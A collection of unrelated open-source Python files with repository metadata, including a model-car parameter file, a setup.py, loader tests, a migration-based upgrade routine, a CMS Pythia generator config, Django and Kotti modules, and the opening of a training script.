a2e7dee9a0ef320ef1a4ca7ee015c89591a5713a | 7707233ec4a550f765fd28e7731f72542478cc1e | /startClient.py | cfee671263f209eef1c6a228f66fa7ad21bc2361 | [] | no_license | Angelina-Wang/518project | 6c971c7dfa34ee44961e127aba72ea9c85d8a762 | fb1056ff66eb18393b4532d6eae935ca6240f517 | refs/heads/master | 2020-09-23T10:29:33.930957 | 2020-01-13T01:01:22 | 2020-01-13T01:01:22 | 225,477,176 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | from custom_classes import *
import sys
# NOTE(review): AClient is provided by the star import from custom_classes
# at the top of the file — confirm against that module.
client = AClient()
# argv[1]: server address to connect to.
client.connectServer(sys.argv[1])
# argv[2]: numeric value passed to restart — presumably a delay/interval; verify.
client.restart(float(sys.argv[2]))
client.startListener()
| [
"None"
] | None |
39f8937093dcbe80de31af680dadd9de39c094e5 | 91a9f5a7afb398f4238527708cbc155dc972cbfa | /teg2/bdd_car_versions/bdd_car_6Aug2017/bair_car/nodes/runtime_parameters.py | fcabb93f3a883c1f48ad5b69ad2cf492c0088468 | [] | no_license | bddmodelcar/kzpy3.2 | cd6f9bf6b7b8b920c79b4ee36c2592b992ae4332 | b044b26649b19b240bd580feca20424a237374b1 | refs/heads/master | 2021-01-19T21:01:58.687712 | 2017-08-23T22:39:56 | 2017-08-23T22:39:56 | 101,243,308 | 0 | 1 | null | 2017-08-24T02:04:50 | 2017-08-24T02:04:50 | null | UTF-8 | Python | false | false | 3,778 | py | # This is used to specifiy caffe mode and data file name information
from kzpy3.utils2 import time_str
from kzpy3.utils2 import opjh
from kzpy3.utils2 import print_stars0
from kzpy3.utils2 import print_stars1
import os
import numpy as np
print_stars0();print(__file__);print_stars1()
# Identify which physical car we are running on; fall back to MR_Unknown.
computer_name = "MR_Unknown"
try:
	computer_name = os.environ["COMPUTER_NAME"]
except KeyError:
	print """********** Please set the environment variable computer_name ***********
e.g.,
export COMPUTER_NAME="Mr_Orange"
"""
####################### general car settings ################
#
# NOTE: the single-iteration for loop is only a visual grouping device; every
# name assigned inside it is still a module-level global.
for i in range(1):
	print('*************' + computer_name + '***********')
	Direct = 1.
	Follow = 0.
	Play = 0.
	Furtive = 0.
	Caf = 0.0
	Racing = 0.0
	Location = 'local' #Smyth_tape'
	weight_file_path = opjh('pytorch_models','epoch6goodnet')
	verbose = False
	use_caffe = True
	NETWORK = 111
	I_ROBOT = 222
	who_is_in_charge = I_ROBOT
	robot_steer = 49
	robot_motor = 49
	steer_gain = 1.0
	motor_gain = 1.0
	acc2rd_threshold = 150
	PID_min_max = [1.5,2.5]
	"""
	gyro_freeze_threshold = 150
	acc_freeze_threshold_x = 7
	acc_freeze_threshold_y_max = 15
	acc_freeze_threshold_y_min = 0
	acc_freeze_threshold_z = 7
	motor_freeze_threshold = 55
	n_avg_IMU = 10
	"""
	gyro_freeze_threshold = 150
	acc_freeze_threshold_x = 4
	acc_freeze_threshold_y_max = 13
	acc_freeze_threshold_y_min = 5
	acc_freeze_threshold_z = 2
	motor_freeze_threshold = 55
	n_avg_IMU = 10
	robot_acc2rd_threshold = 10
	robot_acc_y_exit_threshold = 0
	torch_alt_motor = 59
	#
###################################################################
####################### specific car settings ################
#
"""
if computer_name == 'Mr_Orange':
	#PID_min_max = [2.,3.]
	#motor_gain = 1.0
	Direct = 1.
	Follow = 0.
	Play = 0.
	Furtive = 0.
	pass
if computer_name == 'Mr_Silver':
	#motor_gain = 1.0
	pass
if computer_name == 'Mr_Blue':
	#PID_min_max = [1.5,2.5]
	#motor_gain = 1.0
	pass
if computer_name == 'Mr_Yellow':
	#PID_min_max = [1,2]
	#motor_gain = 0.9
	Direct = 1.
	Follow = 0.
	Play = 0.
	Furtive = 0.
	Caf = 0.0
	Racing = 0.0
	pass
if computer_name == 'Mr_Black':
	#PID_min_max = [1.5,2.5]
	#motor_gain = 1.0
	pass
if computer_name == 'Mr_White':
	#motor_gain = 1.0
	pass
if computer_name == 'Mr_Teal':
	#motor_gain = 1.0
	pass
if computer_name == 'Mr_Audi':
	#motor_gain = 1.0
	pass
if computer_name == 'Mr_Purple':
	#motor_gain = 1.0
	pass
if computer_name == 'Mr_LightBlue':
	#motor_gain = 1.0
	pass
#if computer_name == 'Mr_Blue_Original':
#	motor_gain = 0.5
#	pass
"""
#
###################################################################
# motor_gain = 1.0 # override individual settings
# Exactly one of the task flags above must be set to 1, otherwise assert fires.
if Direct == 1:
	task = 'direct'
elif Play == 1:
	task = 'play'
elif Follow == 1:
	task = 'follow'
elif Furtive == 1:
	task = 'furtive'
elif Racing == 1:
	task = 'racing'
else:
	assert(False)
# Data folder name: [follow_][caffe2_<model>_]<task>_<location>_<timestamp>_<car>.
foldername = ''
if Follow == 1:
	foldername = 'follow_'
model_name = weight_file_path.split('/')[-1]
if Caf == 1:
	foldername = foldername + 'caffe2_' + model_name +'_'
foldername = foldername + task + '_'
foldername = foldername + Location + '_'
foldername = foldername + time_str() + '_'
foldername = foldername + computer_name
"""
#
###################################################################
# Aruco code parameters
ar_params={
	'ar_motor_command' : 49, # This is the resting command for stop
	'ar_max_left_steering_angle' : np.deg2rad(-130),
	'ar_max_right_steering_angle' : np.deg2rad(130),
	'ar_max_left_command' : 100,
	'ar_max_right_command' : 0,
	'ar_left_range' : 50,
	'ar_right_range' : 50,
	'ar_min_perceived_distance' : 9999,
	'ar_critical_distance' : 0.75,
	'ar_stop_distance' : 0.5,
	'ar_max_motor' : 70,
	'ar_min_motor' : 59,
	'ar_override_motor':49,
	'ar_override_steer':49 } # Full stop. Backwards is not considered
"""
| [
"karlzipser@berkeley.edu"
] | karlzipser@berkeley.edu |
fba1184cfd449adefa4e36759c3b17c04ea45157 | d8859f10ea5d4eba76230036535cdb22fb6398ba | /setup.py | 782c08fac224c86b107d7f2f3546e52e8546af76 | [
"MIT"
] | permissive | ebranlard/wiz | 322a83b0f97ad53c990cfaf26c182d02008f856a | 6dfca8b2711b670229f5b2b3b3e0d7fe0bdea156 | refs/heads/master | 2021-06-09T17:26:48.478453 | 2021-06-04T16:29:53 | 2021-06-04T16:37:04 | 181,733,068 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 323 | py | from setuptools import setup, find_packages
setup(
    name='wiz',
    version='1.0',
    description='Python library from E. Branlard',
    url='http://github.com/ebranlard/wiz/',
    author='Emmanuel Branlard',
    author_email='lastname@gmail.com',  # placeholder address, intentionally not the real one
    license='MIT',
    packages=find_packages(),  # auto-discovers every package under the repo root
    zip_safe=False  # install unpacked so package data stays accessible on disk
)
| [
"elmanuelito.github@gmail.com"
] | elmanuelito.github@gmail.com |
86a3adb8a35c843aa7d7252b10b0f4a38d03955b | 76e51e96f663dccf9cd0f3b508dcee18996cf41b | /tests/test_Loading.py | 78222aafe313c998725b2466b5f4c631c20a5184 | [
"MIT"
] | permissive | renaiku/MHWorldData | b8d923765ee00bed08cf4d4c80b6ee88b18da1a9 | 34cf3e2d7e494e84cb48a8f14813480726019139 | refs/heads/master | 2020-03-27T22:33:12.411297 | 2018-09-03T18:41:07 | 2018-09-03T18:41:07 | 147,240,998 | 0 | 0 | MIT | 2018-09-03T18:38:14 | 2018-09-03T18:38:13 | null | UTF-8 | Python | false | false | 2,247 | py | import pytest
import os
import shutil
import json
from mhdata.io import DataReader
def save_json(obj, path):
    """Serialize *obj* as JSON into the file at *path* (text mode)."""
    with open(path, "w") as handle:
        json.dump(obj, handle)
@pytest.fixture()
def loader_mock(tmpdir):
    "Returns loader pointed to a temporary directory created for the test"
    # Rooted at pytest's per-test tmpdir; two languages so the multi-language
    # code paths in DataReader are exercised.
    return DataReader(
        data_path=tmpdir,
        languages=['en', 'ja']
    )
def test_load_base_json(loader_mock, basedata):
    """Loading a base file yields one map entry per base record."""
    save_json(basedata, loader_mock.get_data_path('base.json'))
    base_map = loader_mock.load_base_json('base.json')
    assert len(base_map) == len(basedata), "Expected map and base to match"
def test_load_base_json_has_auto_ids(loader_mock, basedata):
    """Base map entries receive sequential auto ids, addressable by any language."""
    save_json(basedata, loader_mock.get_data_path('base.json'))
    base_map = loader_mock.load_base_json('base.json')
    assert base_map.id_of('ja', 'test2j') == 2, "expected auto id to have value 2"
def test_load_data_json(loader_mock, basedata, subdata):
    """A data file joins 1:1 onto its base map, keyed by entry name."""
    save_json(basedata, loader_mock.get_data_path('base.json'))
    save_json(subdata, loader_mock.get_data_path('data.json'))
    base_map = loader_mock.load_base_json('base.json')
    data_map = loader_mock.load_data_json(base_map.copy(), 'data.json')
    assert len(data_map) == len(base_map), "expecting full join"
    for i in range(1, len(data_map) + 1):
        expected_name = base_map[i].name('en')
        assert data_map[i].name('en') == expected_name, f"expecting names to match for entry {i}"
        assert data_map[i]['data'] == expected_name, "expected data to match the name"
def test_load_split_data_map(loader_mock, basedata, subdata):
    """Data split across several files is merged back in base-map order."""
    save_json(basedata, loader_mock.get_data_path('base.json'))
    split_path = loader_mock.get_data_path('split/')
    os.makedirs(split_path)
    # Write the two records out of order, across two separate files.
    save_json({'test2': subdata['test2']}, os.path.join(split_path, 'split1.json'))
    save_json({'test1': subdata['test1']}, os.path.join(split_path, 'split2.json'))
    base_map = loader_mock.load_base_json('base.json')
    data_map = loader_mock.load_split_data_map(base_map, 'split')
    assert len(data_map) == 2, "expected two entries in the data map"
    names = [entry.name('en') for entry in data_map.values()]
    assert names == ['test1', 'test2'], "Expected names to match in basemap order"
| [
"cfern1990@gmail.com"
] | cfern1990@gmail.com |
12c43770a03fa2dd6d1279173deb78335d2ff25a | a6a52013708c5242ea737950a7614e5585c0b1ae | /oot/upgrade/upgrade.py | 47b18fbdbc1987f0f4df408fc3bb368c4bf7d6be | [] | no_license | tegin/oot | b381ce32686965cbb7979ee44856b1f9695d23d9 | 36d372939dc5bbe65eb7106746f747a87ea29a69 | refs/heads/prod | 2021-07-06T05:09:55.472203 | 2019-11-15T12:36:21 | 2019-11-15T12:36:21 | 216,402,597 | 5 | 5 | null | 2019-11-18T08:28:31 | 2019-10-20T17:47:45 | Python | UTF-8 | Python | false | false | 1,220 | py | import importlib.util
import logging
import os
import pip._internal.main as pip
from packaging import version as packaging_version
_logger = logging.getLogger(__name__)
def upgrade(current_version, version, path, migration_package):
    """Upgrade an installation from *current_version* to *version*.

    Installs ``<path>/requirements.txt`` (when present) and then executes, in
    ascending version order, every ``migration.py`` found under
    *migration_package* whose directory name parses to a version in
    ``(current_version, version]``.

    Args:
        current_version: version currently deployed (must support ordering).
        version: target version to upgrade to.
        path: directory that may contain a ``requirements.txt``.
        migration_package: package whose subdirectories hold the migrations.

    Returns:
        False when already at (or past) the target version, True otherwise.
    """
    if current_version >= version:
        return False
    requirements = os.path.join(path, "requirements.txt")
    if os.path.exists(requirements):
        # Bug fix: the existence check used to be a no-op ("pass") and pip ran
        # unconditionally, failing when no requirements.txt was shipped.
        pip.main(["install", "-r", requirements, "--upgrade"])
    # NOTE(review): ``_path`` is specific to namespace-package __path__
    # objects — confirm migration_package is a namespace package.
    migration_path = migration_package.__path__._path[0]
    pending = []
    for vers in os.listdir(migration_path):
        migration_version = packaging_version.parse(vers)
        if current_version < migration_version <= version:
            pending.append(migration_version)
    for migration in sorted(pending):
        # Load and execute each migration module straight from its file.
        spec = importlib.util.spec_from_file_location(
            "migration",
            os.path.join(migration_path, migration.base_version, "migration.py"),
        )
        module = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(module)
        _logger.info("Executing migration for %s", migration.base_version)
        module.migrate()
    return True
| [
"etobella@creublanca.es"
] | etobella@creublanca.es |
3e2d53619ad1a420b81849bc407d615f9aa85874 | 0fccee4c738449f5e0a8f52ea5acabf51db0e910 | /genfragments/EightTeV/TprimeTprime/TprimeTprimeToTZBWinc_M_625_TuneZ2star_8TeV-madgraph_cff.py | 0074af204c51e90e60f3bb535520fed0d2b05427 | [] | no_license | cms-sw/genproductions | f308ffaf3586c19b29853db40e6d662e937940ff | dd3d3a3826343d4f75ec36b4662b6e9ff1f270f4 | refs/heads/master | 2023-08-30T17:26:02.581596 | 2023-08-29T14:53:43 | 2023-08-29T14:53:43 | 11,424,867 | 69 | 987 | null | 2023-09-14T12:41:28 | 2013-07-15T14:18:33 | Python | UTF-8 | Python | false | false | 5,074 | py | import FWCore.ParameterSet.Config as cms
#from Configuration.Generator.PythiaUEZ2Settings_cfi import *
from Configuration.Generator.PythiaUEZ2starSettings_cfi import *
# Pythia6 hadronizer configuration at sqrt(s) = 8 TeV: tprime (PDG id 8) mass
# set to 625 GeV, decaying 50% to Z0 t and 50% to W b (BRAT(68)/BRAT(71)),
# with MadGraph jet matching in "auto" mode.
generator = cms.EDFilter("Pythia6HadronizerFilter",
    pythiaHepMCVerbosity = cms.untracked.bool(False),
    maxEventsToPrint = cms.untracked.int32(0),
    pythiaPylistVerbosity = cms.untracked.int32(0),
    comEnergy = cms.double(8000.0),
    PythiaParameters = cms.PSet(
        pythiaUESettingsBlock,
        processParameters = cms.vstring(
            'MSTP(1) = 4',
            'MSEL=8 ! fourth generation (t4) fermions',
            'MWID(8)=2',
            'MSTJ(1)=1 ! Fragmentation/hadronization on or off',
            'MSTP(61)=1 ! Parton showering on or off',
            'PMAS(5,1)=4.8 ! b quark mass', #from Spring11 4000040
            'PMAS(6,1)=172.5 ! t quark mass', #from Spring11 4000040
            'PMAS(8,1) = 625.0D0 ! tprime quarks mass',
            'PMAS(8,2) = 6.25D0',
            'PMAS(8,3) = 62.5D0',
            'VCKM(1,1) = 0.97414000D0',
            'VCKM(1,2) = 0.22450000D0',
            'VCKM(1,3) = 0.00420000D0',
            'VCKM(1,4) = 0.02500000D0',
            'VCKM(2,1) = 0.22560000D0',
            'VCKM(2,2) = 0.97170000D0',
            'VCKM(2,3) = 0.04109000D0',
            'VCKM(2,4) = 0.05700000D0',
            'VCKM(3,1) = 0.00100000D0',
            'VCKM(3,2) = 0.06200000D0',
            'VCKM(3,3) = 0.91000000D0',
            'VCKM(3,4) = 0.41000000D0',
            'VCKM(4,1) = 0.01300000D0',
            'VCKM(4,2) = 0.04000000D0',
            'VCKM(4,3) = 0.41000000D0',
            'VCKM(4,4) = 0.91000000D0',
            'MDME(66,1)=0 ! g t4',
            'MDME(67,1)=0 ! gamma t4',
            'KFDP(68,2)=6 ! defines Z0 t (no check)',
            'MDME(68,1)=1 ! Z0 t (2 : on for particle, off for anti-particle) ',
            'MDME(69,1)=0 ! W d',
            'MDME(70,1)=0 ! W s',
            'MDME(71,1)=1 ! W b (3 : off for particle, on for particle) ',
            'MDME(72,1)=0 ! W b4',
            'MDME(73,1)=0 ! h0 t4',
            'MDME(74,1)=-1 ! H+ b',
            'MDME(75,1)=-1 ! H+ b4',
            'BRAT(66) = 0.0D0',
            'BRAT(67) = 0.0D0',
            'BRAT(68) = 0.5D0',
            'BRAT(69) = 0.0D0',
            'BRAT(70) = 0.0D0',
            'BRAT(71) = 0.5D0',
            'BRAT(72) = 0.0D0',
            'BRAT(73) = 0.0D0',
            'BRAT(74) = 0.0D0',
            'BRAT(75) = 0.0D0',
            'MDME(174,1)=1 !Z decay into d dbar',
            'MDME(175,1)=1 !Z decay into u ubar',
            'MDME(176,1)=1 !Z decay into s sbar',
            'MDME(177,1)=1 !Z decay into c cbar',
            'MDME(178,1)=1 !Z decay into b bbar',
            'MDME(179,1)=1 !Z decay into t tbar',
            'MDME(180,1)=-1 !Z decay into b4 b4bar',
            'MDME(181,1)=-1 !Z decay into t4 t4bar',
            'MDME(182,1)=1 !Z decay into e- e+',
            'MDME(183,1)=1 !Z decay into nu_e nu_ebar',
            'MDME(184,1)=1 !Z decay into mu- mu+',
            'MDME(185,1)=1 !Z decay into nu_mu nu_mubar',
            'MDME(186,1)=1 !Z decay into tau- tau+',
            'MDME(187,1)=1 !Z decay into nu_tau nu_taubar',
            'MDME(188,1)=-1 !Z decay into tau4 tau4bar',
            'MDME(189,1)=-1 !Z decay into nu_tau4 nu_tau4bar',
            'MDME(190,1)=1 !W decay into u dbar',
            'MDME(191,1)=1 !W decay into c dbar',
            'MDME(192,1)=1 !W decay into t dbar',
            'MDME(193,1)=-1 !W decay into t4 dbar',
            'MDME(194,1)=1 !W decay into u sbar',
            'MDME(195,1)=1 !W decay into c sbar',
            'MDME(196,1)=1 !W decay into t sbar',
            'MDME(197,1)=-1 !W decay into t4 sbar',
            'MDME(198,1)=1 !W decay into u bbar',
            'MDME(199,1)=1 !W decay into c bbar',
            'MDME(200,1)=1 !W decay into t bbar',
            'MDME(201,1)=-1 !W decay into t4 bbar',
            'MDME(202,1)=-1 !W decay into u b4bar',
            'MDME(203,1)=-1 !W decay into c b4bar',
            'MDME(204,1)=-1 !W decay into t b4bar',
            'MDME(205,1)=-1 !W decay into t4 b4bar',
            'MDME(206,1)=1 !W decay into e- nu_e',
            'MDME(207,1)=1 !W decay into mu nu_mu',
            'MDME(208,1)=1 !W decay into tau nu_tau',
            'MDME(209,1)=-1 !W decay into tau4 nu_tau4'),
        # This is a vector of ParameterSet names to be read, in this order
        parameterSets = cms.vstring('pythiaUESettings',
            'processParameters')
    ),
    jetMatching = cms.untracked.PSet(
        scheme = cms.string("Madgraph"),
        mode = cms.string("auto"), # soup, or "inclusive" / "exclusive"
        MEMAIN_etaclmax = cms.double(5.0),
        MEMAIN_qcut = cms.double(-1),
        MEMAIN_nqmatch = cms.int32(-1),
        MEMAIN_minjets = cms.int32(-1),
        MEMAIN_maxjets = cms.int32(-1),
        MEMAIN_showerkt = cms.double(0),
        MEMAIN_excres = cms.string(''),
        outTree_flag = cms.int32(0)
    )
)
# Sequence executed by the production system; wraps the hadronizer filter above.
ProductionFilterSequence = cms.Sequence(generator)
| [
"sha1-5c9a4926c1ea08b633689ec734e2440da58b8c56@cern.ch"
] | sha1-5c9a4926c1ea08b633689ec734e2440da58b8c56@cern.ch |
19c036b8c37c66b0214ccbfc8b7a4c13c90935d2 | 87402fcec35a35a45dc305588323c72fa3d203b0 | /tasks/migrations/0022_auto_20200925_1348.py | 30bef7017d73304f6deadfa32abf64fe1e491aa8 | [] | no_license | Aviemusca/task-manager-backend | d80fd20a5aa88a31f5096d17c3ee1ebe86832c7e | b0a9052d94138f4e7d2c1be7f7425ee570f9eec4 | refs/heads/master | 2022-12-20T10:06:16.648889 | 2020-09-29T10:31:33 | 2020-09-29T10:31:33 | 278,863,723 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 449 | py | # Generated by Django 3.0.8 on 2020-09-25 13:48
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: alter the default of ``Task.deadline``."""
    dependencies = [
        ('tasks', '0021_auto_20200907_1043'),
    ]
    operations = [
        migrations.AlterField(
            model_name='task',
            name='deadline',
            # NOTE(review): makemigrations froze a concrete timestamp here
            # (presumably a `now() + 7 days` expression evaluated at generation
            # time), so the column default is this fixed 2020 datetime — confirm
            # the model itself uses a callable default.
            field=models.DateTimeField(default=datetime.datetime(2020, 10, 2, 13, 47, 57, 676103)),
        ),
    ]
| [
"yvan@metatech.ie"
] | yvan@metatech.ie |
9a92c56ebf23abfd32e027a9bee74caebb691d5d | f74dd098c3e665d8f605af5ebe7e2874ac31dd2f | /aiogithubapi/objects/repository/release.py | 61c880ab667788e696a65c262a1162a9b0c98748 | [
"MIT"
] | permissive | ludeeus/aiogithubapi | ce87382698827939aaa127b378b9a11998f13c06 | 90f3fc98e5096300269763c9a5857481b2dec4d2 | refs/heads/main | 2023-08-20T19:30:05.309844 | 2023-08-14T20:24:21 | 2023-08-14T20:24:21 | 198,505,021 | 21 | 20 | MIT | 2023-09-11T06:12:10 | 2019-07-23T20:39:53 | Python | UTF-8 | Python | false | false | 986 | py | """
AIOGitHubAPI: Repository Release
https://developer.github.com/v3/repos/releases/
"""
# pylint: disable=missing-docstring
from datetime import datetime
from ...objects.base import AIOGitHubAPIBase
from ...objects.repository.content import AIOGitHubAPIRepositoryContent
class AIOGitHubAPIRepositoryRelease(AIOGitHubAPIBase):
    """Repository Release GitHub API implementation.

    Wraps the raw release payload stored in ``self.attributes`` and exposes
    the commonly used fields as properties.
    """

    @property
    def tag_name(self):
        """The git tag the release was created from."""
        return self.attributes.get("tag_name")

    @property
    def name(self):
        """The release title."""
        return self.attributes.get("name")

    @property
    def published_at(self):
        """Publish time as a naive UTC ``datetime``, or None if unpublished.

        Draft releases carry a null ``published_at`` in the API payload;
        returning None instead of letting ``strptime(None, ...)`` raise a
        TypeError keeps attribute access safe for drafts.
        """
        published = self.attributes.get("published_at")
        if published is None:
            return None
        return datetime.strptime(published, "%Y-%m-%dT%H:%M:%SZ")

    @property
    def draft(self):
        """True if this release is a draft."""
        return self.attributes.get("draft")

    @property
    def prerelease(self):
        """True if this release is flagged as a prerelease."""
        return self.attributes.get("prerelease")

    @property
    def assets(self):
        """Release assets wrapped as AIOGitHubAPIRepositoryContent objects."""
        return [AIOGitHubAPIRepositoryContent(x) for x in self.attributes.get("assets", [])]
| [
"noreply@github.com"
] | ludeeus.noreply@github.com |
b961193349a8103c8c431616e1dd217e33b4484d | 0fef5d75b0896116eda121c4d7c8a4ad6686a0f7 | /kotti_image_gallery/views.py | aca92925141697899cbe39251257bae08515e3ba | [] | no_license | disko/kotti_image_gallery | 1144d06f31f3d07f759b73d88a066730bc0ed920 | 046d127effdf3774cf0c1b04f2ef599e6134becb | HEAD | 2016-09-06T05:11:24.588627 | 2012-06-20T09:10:36 | 2012-06-20T09:10:36 | 4,111,810 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,719 | py | # -*- coding: utf-8 -*-
import PIL
from kotti import DBSession
from kotti.util import _
from kotti.views.edit import ContentSchema, make_generic_add, make_generic_edit
from kotti.views.file import AddFileFormView, EditFileFormView
from kotti_image_gallery import image_scales
from kotti_image_gallery.resources import Gallery, Image
from plone.scale.scale import scaleImage
from pyramid.response import Response
from pyramid.view import view_config
# Enlarge PIL's in-memory encoder buffer to 32 MiB so large images can be
# encoded in a single block (presumably needed for big/progressive JPEGs —
# TODO confirm which save paths require it here).
PIL.ImageFile.MAXBLOCK = 33554432
class GallerySchema(ContentSchema):
    """Schema for Gallery add/edit forms; no fields beyond ContentSchema."""
    pass
class BaseView(object):
    """Tiny helper base that couples the traversal context with the request."""

    def __init__(self, context, request):
        # The two attributes are independent; store them straight off.
        self.request = request
        self.context = context
class GalleryView(BaseView):
    """Read views for Gallery containers."""
    @view_config(context=Gallery,
                 name='view',
                 permission='view',
                 renderer='templates/gallery-view.pt')
    def view(self):
        """Render the gallery page with its child images ordered by position."""
        session = DBSession()
        # Children are fetched directly by parent_id rather than via the ORM
        # relationship, ordered by their stored position.
        query = session.query(Image).filter(Image.parent_id==self.context.id).order_by(Image.position)
        images = query.all()
        return {"images": images}
class EditImageFormView(EditFileFormView):
    """Edit form for Image content; inherits everything from EditFileFormView."""
    pass
class AddImageFormView(AddFileFormView):
    """Add form for Image content."""
    item_type = _(u"Image")
    def add(self, **appstruct):
        """Build an Image node from the validated form appstruct.

        The upload is read fully into memory so its byte size can be recorded.
        """
        buf = appstruct['file']['fp'].read()
        return Image(title=appstruct['title'],
                     description=appstruct['description'],
                     data=buf,
                     filename=appstruct['file']['filename'],
                     mimetype=appstruct['file']['mimetype'],
                     size=len(buf), )
class ImageView(BaseView):
    """Views for a single Image: an HTML page plus the raw (optionally scaled) bytes."""
    @view_config(context=Image,
                 name='view',
                 permission='view',
                 renderer='templates/image-view.pt')
    def view(self):
        """Render the image detail page; the template pulls everything from context."""
        return {}
    @view_config(context=Image,
                 name="image",
                 permission='view')
    def image(self):
        """Return the image, optionally scaled, inline (default) or as attachment.

        The scale is taken from the request subpath; a trailing ``download``
        element switches the Content-Disposition to attachment.
        """
        subpath = list(self.request.subpath)
        if (len(subpath) > 0) and (subpath[-1] == "download"):
            disposition = "attachment"
            subpath.pop()
        else:
            disposition = "inline"
        # Determine the requested size; (None, None) means "serve the original".
        if len(subpath) == 1:
            scale = subpath[0]
            if scale in image_scales:
                # /path/to/image/scale/thumb  -- named, preconfigured scale
                width, height = image_scales[scale]
            else:
                # /path/to/image/scale/160x120
                try:
                    width, height = [int(v) for v in scale.split("x")]
                except ValueError:
                    width, height = (None, None)
        elif len(subpath) == 2:
            # /path/to/image/scale/160/120
            try:
                width, height = [int(v) for v in subpath]
            except ValueError:
                width, height = (None, None)
        else:
            # don't scale at all
            width, height = (None, None)
        if width and height:
            # "thumb" direction fits the image inside the box, keeping aspect.
            image, format, size = scaleImage(self.context.data,
                                             width=width,
                                             height=height,
                                             direction="thumb")
        else:
            image = self.context.data
        # Non-ASCII characters are dropped from the filename for the header.
        res = Response(
            headerlist=[('Content-Disposition', '%s;filename="%s"' % (disposition,
                        self.context.filename.encode('ascii', 'ignore'))),
                        ('Content-Length', str(len(image))),
                        ('Content-Type', str(self.context.mimetype)), ],
            app_iter=image)
        return res
def includeme(config):
    """Pyramid include hook: register static assets, scan views, wire forms."""
    config.add_static_view('static-kotti_image_gallery', 'kotti_image_gallery:static')
    config.scan("kotti_image_gallery")
    # Image content uses the custom upload-aware form views.
    config.add_view(AddImageFormView,
                    name=Image.type_info.add_view,
                    permission='add',
                    renderer='kotti:templates/edit/node.pt',)
    config.add_view(EditImageFormView,
                    context=Image,
                    name='edit',
                    permission='edit',
                    renderer='kotti:templates/edit/node.pt', )
    # Gallery content uses Kotti's generic schema-driven add/edit forms.
    config.add_view(make_generic_edit(GallerySchema()),
                    context=Gallery,
                    name='edit',
                    permission='edit',
                    renderer='kotti:templates/edit/node.pt', )
    config.add_view(make_generic_add(GallerySchema(), Gallery),
                    name=Gallery.type_info.add_view,
                    permission='add',
                    renderer='kotti:templates/edit/node.pt', )
| [
"disko@binary-punks.com"
] | disko@binary-punks.com |
a4119ba39b831d8757ef26706cf178071762301f | 9f1a56cbf621b34f539b64e526f00f68423a235a | /zigida/apps/db/accounting/items/migrations/0001_initial.py | ff2e312708e73881e78622e43232fdf8253ba8b9 | [] | no_license | JacobSima/zando | 21d982b190a719982bd5648ac135fbfbe45dbf00 | e6fcac1ce97796d1dea5104f1b73bbf9b8822b98 | refs/heads/main | 2023-06-15T03:51:52.846591 | 2021-07-12T10:52:25 | 2021-07-12T10:52:25 | 385,208,981 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,226 | py | # Generated by Django 3.2.4 on 2021-07-06 15:56
import django.core.validators
from django.db import migrations, models
import uuid
import zigida.core.utils
class Migration(migrations.Migration):
    """Auto-generated initial migration: create the ``items`` table."""
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Item',
            fields=[
                ('datetime_created', models.DateTimeField(auto_now_add=True, verbose_name='DATE CREATED')),
                ('datetime_updated', models.DateTimeField(auto_now=True, verbose_name='DATE UPDATED')),
                ('last_updated_by', models.CharField(blank=True, max_length=50, null=True, verbose_name='LAST UPDATED BY')),
                ('bool_deleted', models.BooleanField(default=False, verbose_name='IS DELETED?')),
                ('uuid_code', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False, verbose_name='ID')),
                ('token_key', models.UUIDField(blank=True, default=uuid.uuid4, editable=False, null=True, verbose_name='TOKEN')),
                ('code', models.CharField(default=zigida.core.utils.item_randcode_gen, max_length=100, verbose_name='CODE')),
                ('quantity', models.PositiveSmallIntegerField(blank=True, default=1, null=True, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(999)], verbose_name='QUANTITY')),
                ('price_buy', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=19, verbose_name='PRICE BUY')),
                ('price_buy_original', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=19, verbose_name='PRICE BUY ORIGINAL')),
                ('price_sell', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=19, verbose_name='PRICE SELL')),
                ('price_sell_original', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=19, verbose_name='PRICE SELL ORIGINAL')),
                ('bool_active', models.BooleanField(default=True, verbose_name='IS ACTIVE')),
            ],
            # Explicit table name instead of Django's default "<app>_item".
            options={
                'verbose_name_plural': 'items',
                'db_table': 'items',
            },
        ),
    ]
| [
"simajacob2011@gmail.com"
] | simajacob2011@gmail.com |
7999c9e767ff7ebde5862e9be1c8e6c2ba746d76 | 0e1e643e864bcb96cf06f14f4cb559b034e114d0 | /Exps_7_v3/doc3d/Ablation3_Pyr_ch016_ep010_noFocus/step10_b1_train.py | 3aaadbfa5d58d8ec98b4c4672a778cf2dced46a2 | [] | no_license | KongBOy/kong_model2 | 33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307 | 1af20b168ffccf0d5293a393a40a9fa9519410b2 | refs/heads/master | 2022-10-14T03:09:22.543998 | 2022-10-06T11:33:42 | 2022-10-06T11:33:42 | 242,080,692 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,653 | py | #############################################################################################################################################################################################################
#############################################################################################################################################################################################################
### Add kong_model2 to sys.path
import os
code_exe_path = os.path.realpath(__file__) ### path of the currently running step10_b.py
code_exe_path_element = code_exe_path.split("\\") ### split the path; next we find how deep kong_model2 sits
kong_layer = code_exe_path_element.index("kong_model2") ### find at which level kong_model2 lives
kong_model2_dir = "\\".join(code_exe_path_element[:kong_layer + 1]) ### locate the kong_model2 dir
import sys ### add kong_model2 to sys.path
sys.path.append(kong_model2_dir)
# print(__file__.split("\\")[-1])
# print(" code_exe_path:", code_exe_path)
# print(" code_exe_path_element:", code_exe_path_element)
# print(" kong_layer:", kong_layer)
# print(" kong_model2_dir:", kong_model2_dir)
###############################################################################################################################################################################################################
# When running via F5: if we are not inside step10_b.py's folder, switch there automatically so step10_a.py can be imported!
code_exe_dir = os.path.dirname(code_exe_path) ### dir of the currently running step10_b.py
